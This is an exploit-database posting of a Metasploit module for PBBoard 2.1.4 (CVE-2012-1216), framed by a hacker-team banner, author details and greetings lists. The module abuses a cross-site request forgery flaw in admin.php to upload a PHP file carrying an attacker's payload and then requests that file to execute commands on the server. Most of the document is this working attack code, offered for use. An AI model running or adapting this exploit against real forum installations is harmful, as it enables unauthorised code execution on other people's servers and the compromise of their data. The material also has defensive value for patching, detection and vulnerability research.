PBBoard 2.1.4 Cross Site Request Forgery

`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution (MSF)  
# Author : KedAns-Dz  
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)  
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)  
# Web Site : www.1337day.com | www.inj3ct0rs.com  
# mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d  
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com  
# platform : php  
# Type : Metasploit -Remote Exploit-  
# Security Risk : Critical  
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10  
###  
  
##  
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |  
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |  
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha |  
# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** |  
# | ------------------------------------------------- < |  
##  
  
# <3 <3 Greetings t0 Palestine <3 <3  
  
# Download : [http://github.com/downloads/PhpMax/PBBoard/PBBoard_v2_1_4.zip]  
  
######## (!) References =>  
# _______________  
# | CVE-2012-1216 |  
# | OSVDB-79218 |  
# | 1337ID-17520 |  
# | PS-SEC-109706 |  
# | CWE-352 |  
# ---------------  
#  
######## (!) Exploit ====>  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution",  
'Description' => %q{  
This module exploits a Multiple cross-site request forgery (CSRF) vulnerabilities   
in admin.php in PBBoard 2.1.4 allow remote attackers to hijack the authentication   
of administrators for requests that upload a file via an add action.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'KedAns-Dz <ked-h[at]1337day.com>', # Discovery PoC ,and Metasploit module  
],  
'References' =>  
[  
['CVE', '2012-1216'],  
['OSVDB', '79218'],  
['URL', 'http://1337day.com/exploits/17520'], # 1337ID-17520  
['URL', 'http://secunia.com/advisories/47948/'], # SA47948  
['URL', 'http://packetstormsecurity.org/files/109706/PBBoard-2.1.4-Cross-Site-Request-Forgery-Shell-Upload.html'] # PS-SEC-109706  
# CWE-352  
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1216  
],  
'Payload' =>  
{  
'BadChars' => "\x00"  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "none"  
},  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['PBBoard v2.1.4', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => "Fev 12 2012",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to dorncms', '/PBBoard v2.1.4'])  
], self.class)  
end  
  
def check  
uri = target_uri.path  
uri << '/' if uri[-1,1] != '/'  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => "#{uri}admin.php"  
})  
  
if res and res.code == 200 and res.body.empty?  
return Exploit::CheckCode::Detected  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
uri = target_uri.path  
uri << '/' if uri[-1,1] != '/'  
  
peer = "#{rhost}:#{rport}"  
payload_name = Rex::Text.rand_text_alpha(rand(5) + 5) + '.php'  
  
post_data = "--1337day\r\n"  
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"  
post_data << "Content-Type : text/html;\r\n"  
post_data << "<?php "  
post_data << payload.encoded  
post_data << " ?>\r\n"  
post_data << "--1337day\r\n"  
  
print_status("#{peer} - Sending PHP payload (#{payload_name})")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => "#{uri}admin.php?page=pages&add=1&start=1",  
'ctype' => 'multipart/form-data; boundary=1337day',  
'data' => post_data  
})  
  
if not res or res.code != 200 or res.body !~ /#{payload_name}/  
print_error("#{peer} - I don't think the file was uploaded !")  
return  
end  
  
print_status("#{peer} - Executing PHP payload (#{payload_name})")  
# Execute our payload  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => "#{uri}#{payload_name}"  
})  
  
if res and res.code != 200  
print_status("#{peer} - Server returns #{res.code.to_s}")  
end  
end  
  
############# << ThE|End  
  
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================  
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w  
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)  
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection  
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke  
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE  
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs ..  
#===========================================================================================================`